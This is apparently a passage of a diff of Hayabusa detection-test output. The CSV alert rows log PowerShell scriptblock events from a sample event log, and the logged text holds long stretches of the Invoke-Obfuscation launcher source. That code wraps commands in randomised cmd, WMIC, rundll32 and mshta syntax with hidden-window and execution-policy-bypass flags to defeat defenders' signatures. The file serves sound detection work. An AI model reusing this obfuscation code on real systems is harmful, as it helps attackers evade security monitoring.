-Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the command-line arguments. # This is to pr",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-PowerShellLauncher { <# .SYNOPSIS Applies launch syntax to PowerShell command so it can be run from cmd.exe and have its command line arguments further obfuscated via launch obfuscation techniques. Invoke-Obfuscation Function: Out-PowerShellLauncher Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (used for WMIC launcher -- located in Out-ObfuscatedStringCommand.ps1), Out-ConcatenatedString (used for WMIC and MSHTA launchers -- located in Out-ObfuscatedTokenCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-PowerShellLauncher obfuscates a given PowerShell command (via stdin, process-level environment variables, clipboard, etc.) while wrapping it in syntax to be launched directly from cmd.exe. Some techniques also push command line arguments to powershell.exe's parent (denoted with +) or even grandparent (denoted with ++) process command line arguments. 1 --> PS 2 --> CMD 3 --> WMIC 4 --> RUNDLL 5 --> VAR+ 6 --> STDIN+ 7 --> CLIP+ 8 --> VAR++ 9 --> STDIN++ 10 --> CLIP++ 11 --> RUNDLL++ 12 --> MSHTA++ .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER LaunchType Specifies the launch syntax to apply to ScriptBlock. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER SwitchesAsString (Optional) Specifies above PowerShell execution flags per a single string. .EXAMPLE C:\PS> Out-PowerShellLauncher -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive 3 C:\windows\SYstEM32\cmd.EXe /C ""sET oPUWV=Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green&& POWErshELl -NOnINt -noPrOfil ${eX`eCUti`on`cO`NTeXT}.\""INVO`k`e`coMMANd\"".\""INvo`KeS`C`RIPt\""( ( GET-CHI`Ldit`EM EnV:OPuwV ).\""v`AlUE\"" )"" .NOTES This cmdlet is an ideal last step after applying other obfuscation cmdlets to your script block or file path contents. Its more advanced obfuscation options are included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent or grandparent process' command line arguments. There are additional techniques to split the command contents cross multiple commands and have the final PowerShell command re-assemble in memory and execute that are not currently included in this version. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [ValidateSet(1,2,3,4,5,6,7,8,9,10,11,12)] [Int] $LaunchType, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Parameter(Position = 2)] [String] $SwitchesAsString ) # To capture and output args in a process tree format for the applied launcher syntax. $ArgsDefenderWillSee = @() # Convert ScriptBlock to a String. $ScriptString = [String]$ScriptBlock # Check and throw warning message if input $ScriptString contains new line characters. If($ScriptString.Contains([Char]13+[Char]10)) { Write-Host """" Write-Warning ""Current script content contains newline characters.`n Applying a launcher will not work on the command line.`n Apply ENCODING obfuscation before applying LAUNCHER."" Start-Sleep 1 Return $ScriptString } # $SwitchesAsString argument for passing in flags from user input in Invoke-Obfuscation. If($SwitchesAsString.Length -gt 0) { If(!($SwitchesAsString.Contains('0'))) { $SwitchesAsString = ([Char[]]$SwitchesAsString | Sort-Object -Unique -Descending) -Join ' ' ForEach($SwitchAsString in $SwitchesAsString.Split(' ')) { Switch($SwitchAsString) { '1' {$NoExit = $TRUE} '2' {$NonInteractive = $TRUE} '3' {$NoLogo = $TRUE} '4' {$NoProfile = $TRUE} '5' {$Command = $TRUE} '6' {$WindowsStyle = 'Hidden'} '7' {$ExecutionPolicy = 'Bypass'} '8' {$Wow64 = $TRUE} default {Write-Error ""An invalid `$SwitchAsString value ($SwitchAsString) was passed to switch block for Out-PowerShellLauncher""; Exit;} } } } } # Parse out and escape key characters in particular token types for powershell.exe (in reverse to make indexes simpler for escaping tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $CharsToEscape = @('&','|','<','>') For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Manually extract token since tokenization will remove certain characters and whitespace which we want to retain. $PreTokenStr = $ScriptString.SubString(0,$Token.Start) $ExtractedToken = $ScriptString.SubString($Token.Start,$Token.Length) $PostTokenStr = $ScriptString.SubString($Token.Start+$Token.Length) # Escape certain characters that will be problematic on the command line for powershell.exe (\) and cmd.exe (^). # Single cmd escaping (^) for strings encapsulated by double quotes. For all other tokens apply double layer escaping (^^^). If($Token.Type -eq 'String' -AND !($ExtractedToken.StartsWith(""'"") -AND $ExtractedToken.EndsWith(""'""))) { ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^$Char"")} } If($ExtractedToken.Contains('\')) {$ExtractedToken = $ExtractedToken.Replace('\','\\')} If($ExtractedToken.Contains('""')) {$ExtractedToken = '\""' + $ExtractedToken.SubString(1,$ExtractedToken.Length-1-1) + '\""'} } Else { # Before adding layered escaping for special characters for cmd.exe, preserve escaping of ^ used NOT as an escape character (like as part of an Empire key). If($ExtractedToken.Contains('^')) { $ExtractedTokenSplit = $ExtractedToken.Split('^') $ExtractedToken = '' For($j=0; $j -lt $ExtractedTokenSplit.Count; $j++) { $ExtractedToken += $ExtractedTokenSplit[$j] $FirstCharFollowingCaret = $ExtractedTokenSplit[$j+1] If(!$FirstCharFollowingCaret -OR ($CharsToEscape -NotContains $FirstCharFollowingCaret.SubString(0,1)) -AND ($j -ne $ExtractedTokenSplit.Count-1)) { $ExtractedToken += '^^^^' } } } ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^^^$Char"")} } } # Add $ExtractedToken back into context in $ScriptString $ScriptString = $PreTokenStr + $ExtractedToken + $PostTokenStr } # Randomly select PowerShell execution flag argument substrings and randomize the order for all flags passed to this function. # This is to prevent the Blue Team from placing false hope in simple signatures for the shortest form of these arguments or consistent ordering. $PowerShellFlags = New-Object String[](0) If($PSBoundParameters['NoExit'] -OR $NoExit) { $FullArgument = ""-NoExit"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile'] -OR $NoProfile) { $FullArgument = ""-NoProfile"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive'] -OR $NonInteractive) { $FullArgument = ""-NonInteractive"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo'] -OR $NoLogo) { $FullArgument = ""-NoLogo"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to overwrite the WindowStyle value with the corresponding integer representation of the predefined parameter value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the command-line arguments. # This is to pr",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"event the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command'] -OR $Command) { $FullArgument = ""-Command"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. # Maintain array of PS flags for some launch types (namely CLIP+, CLIP++ and RunDll32). $PowerShellFlagsArray = $PowerShellFlags $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out paths to binaries depending if 32-bit or 64-bit options were selected. $System32Path = $Env:ComSpec.SubString(0,$Env:ComSpec.LastIndexOf('\')) $PathToRunDll = Get-Random -Input @(""$System32Path\rundll32"" , ""$System32Path\rundll32.exe"" , ""rundll32"" , ""rundll32.exe"") $PathToMshta = Get-Random -Input @(""$System32Path\mshta"" , ""$System32Path\mshta.exe"" , ""mshta"" , ""mshta.exe"") $PathToCmd = Get-Random -Input @(""$System32Path\cmd"" , ""$System32Path\cmd.exe"" , ""cmd.exe"" , ""cmd"") $PathToClip = Get-Random -Input @(""$System32Path\clip"" , ""$System32Path\clip.exe"" , ""clip"" , ""clip.exe"") $PathToWmic = Get-Random -Input @(""$System32Path\WBEM\wmic"" , ""$System32Path\WBEM\wmic.exe"" , ""wmic"" , ""wmic.exe"") # If you use cmd or cmd.exe instead of the pathed version, then you don't need to put a whitespace between cmd and and cmd flags. E.g. cmd/c or cmd.exe/c. If($PathToCmd.Contains('\')) { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 2 -Maximum 4) } Else { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 0 -Maximum 4) } If($PSBoundParameters['Wow64'] -OR $Wow64) { $PathToPowerShell = ""$($Env:WinDir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$PathToPowerShell = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe"" $PathToPowerShell = ""powershell"" } # Randomize the case of the following variables. $PowerShellFlags = ([Char[]]$PowerShellFlags.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToPowerShell = ([Char[]]$PathToPowerShell.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToRunDll = ([Char[]]$PathToRunDll.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToMshta = ([Char[]]$PathToMshta.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToCmd = ([Char[]]$PathToCmd.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToClip = ([Char[]]$PathToClip.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToWmic = ([Char[]]$PathToWmic.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SlashC = ([Char[]]'/c'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Echo = ([Char[]]'echo'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Show warning if an uneven number of double-quotes exists for any $LaunchType. $NumberOfDoubleQuotes = $ScriptString.Length-$ScriptString.Replace('""','').Length If($NumberOfDoubleQuotes%2 -eq 1) { Write-Host """" Write-Warning ""This command contains an unbalanced number of double quotes ($NumberOfDoubleQuotes).`n Try applying STRING or ENCODING obfuscation options first to encode the double quotes.`n"" Start-Sleep 1 Return $ScriptString } # If no $LaunchType is specified then randomly choose from options 3-20. If($LaunchType -eq 0) { $LaunchType = Get-Random -Input @(3..12) } # Select launcher syntax. Switch($LaunchType) { 1 { ######## ## PS ## ######## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToPowerShell + $PSCmdSyntax } 2 { ######### ## CMD ## ######### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} If($ScriptString.Contains(""^$Char"")) {$ScriptString = $ScriptString.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToCmd + $CmdSyntax } 3 { ########## ## WMIC ## ########## # WMIC errors when variables contain more than 2 adjacent whitespaces in variable names. Thus we are escaping them here. For($i=1; $i -le 12; $i++) { $StringToReplace = '${' + ' '*$i + '}' If($ScriptString.Contains($StringToReplace)) { $ScriptString = $ScriptString.Replace($StringToReplace,$StringToReplace.Replace(' ','\ ')) } } # Undo escaping from beginning of function. $CharsToEscape is defined at beginning of this function. ForEach($Char in $CharsToEscape) { While($ScriptString.Contains('^' + $Char)) { $ScriptString = $ScriptString.Replace(('^' + $Char),$Char) } } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Perform inline substitutions to remove commas from command line for wmic.exe. If($ScriptString.Contains(',')) { # SetVariables will only be used if more than 5 double quotes or more than 5 commas need to be escaped. $SetVariables = '' # Since we are converting the PowerShell command into strings for concatenation we need to escape and double-escape $ for proper variable interpretation by PowerShell. If($ScriptString.Contains('$')) { $ScriptString = $ScriptString.Replace('$','`$') # Double escape any $ characters that were already escaped prior to above escaping step. If($ScriptString.Contains('``$')) { $ScriptString = $ScriptString.Replace('``$','```$') } } # Double escape any escaped "" characters. If($ScriptString.Contains('`""')) { $ScriptString = $ScriptString.Replace('`""','``""') } # Substitute double quotes as well if we're substituting commas as this requires treating the entire command as a string by encapsulating it with double quotes. If($ScriptString.Contains('""')) { # Remove all layers of escaping for double quotes as they are no longer necessary since we're casting these double quotes to ASCII values. While($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""') } # Randomly select a syntax for the Char conversion of a double quote ASCII value and then ramdomize the case. $CharCastDoubleQuote = ([Char[]](Get-Random -Input @('[String][Char]34','([Char]34).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace('""','').Length -le 5) { # Replace double quote(s) with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastDoubleQuote + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace('""',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. $RandomVarNameMaybeConcatenated = $RandomVarName",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"event the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command'] -OR $Command) { $FullArgument = ""-Command"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. # Maintain array of PS flags for some launch types (namely CLIP+, CLIP++ and RunDll32). $PowerShellFlagsArray = $PowerShellFlags $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out paths to binaries depending if 32-bit or 64-bit options were selected. $System32Path = $Env:ComSpec.SubString(0,$Env:ComSpec.LastIndexOf('\')) $PathToRunDll = Get-Random -Input @(""$System32Path\rundll32"" , ""$System32Path\rundll32.exe"" , ""rundll32"" , ""rundll32.exe"") $PathToMshta = Get-Random -Input @(""$System32Path\mshta"" , ""$System32Path\mshta.exe"" , ""mshta"" , ""mshta.exe"") $PathToCmd = Get-Random -Input @(""$System32Path\cmd"" , ""$System32Path\cmd.exe"" , ""cmd.exe"" , ""cmd"") $PathToClip = Get-Random -Input @(""$System32Path\clip"" , ""$System32Path\clip.exe"" , ""clip"" , ""clip.exe"") $PathToWmic = Get-Random -Input @(""$System32Path\WBEM\wmic"" , ""$System32Path\WBEM\wmic.exe"" , ""wmic"" , ""wmic.exe"") # If you use cmd or cmd.exe instead of the pathed version, then you don't need to put a whitespace between cmd and and cmd flags. E.g. cmd/c or cmd.exe/c. If($PathToCmd.Contains('\')) { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 2 -Maximum 4) } Else { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 0 -Maximum 4) } If($PSBoundParameters['Wow64'] -OR $Wow64) { $PathToPowerShell = ""$($Env:WinDir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$PathToPowerShell = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe"" $PathToPowerShell = ""powershell"" } # Randomize the case of the following variables. $PowerShellFlags = ([Char[]]$PowerShellFlags.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToPowerShell = ([Char[]]$PathToPowerShell.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToRunDll = ([Char[]]$PathToRunDll.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToMshta = ([Char[]]$PathToMshta.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToCmd = ([Char[]]$PathToCmd.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToClip = ([Char[]]$PathToClip.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToWmic = ([Char[]]$PathToWmic.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SlashC = ([Char[]]'/c'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Echo = ([Char[]]'echo'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Show warning if an uneven number of double-quotes exists for any $LaunchType. $NumberOfDoubleQuotes = $ScriptString.Length-$ScriptString.Replace('""','').Length If($NumberOfDoubleQuotes%2 -eq 1) { Write-Host """" Write-Warning ""This command contains an unbalanced number of double quotes ($NumberOfDoubleQuotes).`n Try applying STRING or ENCODING obfuscation options first to encode the double quotes.`n"" Start-Sleep 1 Return $ScriptString } # If no $LaunchType is specified then randomly choose from options 3-20. If($LaunchType -eq 0) { $LaunchType = Get-Random -Input @(3..12) } # Select launcher syntax. Switch($LaunchType) { 1 { ######## ## PS ## ######## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToPowerShell + $PSCmdSyntax } 2 { ######### ## CMD ## ######### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} If($ScriptString.Contains(""^$Char"")) {$ScriptString = $ScriptString.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToCmd + $CmdSyntax } 3 { ########## ## WMIC ## ########## # WMIC errors when variables contain more than 2 adjacent whitespaces in variable names. Thus we are escaping them here. For($i=1; $i -le 12; $i++) { $StringToReplace = '${' + ' '*$i + '}' If($ScriptString.Contains($StringToReplace)) { $ScriptString = $ScriptString.Replace($StringToReplace,$StringToReplace.Replace(' ','\ ')) } } # Undo escaping from beginning of function. $CharsToEscape is defined at beginning of this function. ForEach($Char in $CharsToEscape) { While($ScriptString.Contains('^' + $Char)) { $ScriptString = $ScriptString.Replace(('^' + $Char),$Char) } } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Perform inline substitutions to remove commas from command line for wmic.exe. If($ScriptString.Contains(',')) { # SetVariables will only be used if more than 5 double quotes or more than 5 commas need to be escaped. $SetVariables = '' # Since we are converting the PowerShell command into strings for concatenation we need to escape and double-escape $ for proper variable interpretation by PowerShell. If($ScriptString.Contains('$')) { $ScriptString = $ScriptString.Replace('$','`$') # Double escape any $ characters that were already escaped prior to above escaping step. If($ScriptString.Contains('``$')) { $ScriptString = $ScriptString.Replace('``$','```$') } } # Double escape any escaped "" characters. If($ScriptString.Contains('`""')) { $ScriptString = $ScriptString.Replace('`""','``""') } # Substitute double quotes as well if we're substituting commas as this requires treating the entire command as a string by encapsulating it with double quotes. If($ScriptString.Contains('""')) { # Remove all layers of escaping for double quotes as they are no longer necessary since we're casting these double quotes to ASCII values. While($ScriptString.Contains('\""')) { $ScriptString = 